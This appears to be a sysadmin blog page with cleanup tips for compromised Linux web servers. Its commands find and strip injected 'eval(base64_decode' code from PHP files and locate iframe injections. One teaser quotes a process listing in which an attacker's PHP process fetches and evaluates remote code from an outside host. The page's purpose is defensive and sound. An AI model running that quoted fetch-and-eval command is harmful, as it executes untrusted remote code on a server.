How to Remove “eval(base64_decode”

First, we must find all infested files using following command.

root@hr# cd /home/username/public_html/

root@hr#grep -lr --include=*.php "eval(base64_decode" *

How to Remove the code ?

grep -lr --include=*.php "eval(base64_decode" /home/username/public_html/ | xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'

Please try it.

HR-ADMIN

If you find that images are not loading in linux server then you should disable php functions.php.ini is configuration file of PHP.Find exact path of php.ini# php -i | grep php.iniOr you can use the another command like# php.iniConfiguration File (php.ini) Path => /usr/local/libLoaded Configuration File => /usr/local/lib/php.inithen search disabled…

Hack Attempt via entropysearch CGI script

If you have noticed server loaded and following process running on your server Be alert!! Something WRONG going on on your server 877082 aatwdhh 20 0 332m 3232 520 R 45.9 0.0 105:23.78 php -r eval(file_get_contents('http://hello. hacked. jp/hello/n.php?a=207589788&b=26786093&u= 750767 coavjuwv3 20 0 332m 6308 512 R 45.5 0.1 391:25.41…

Iframe: How to remove it ?

For iFRME injection, first search the all domains on the server using following command which are infected then remove it using following script. find /home/*/public_html/ -type f -exec grep -Eil "iframedomain.com" {} \; >> scanresult.txt Where iframedomain.com is injected domain. Now use following script to remove it. vi remove.sh and add…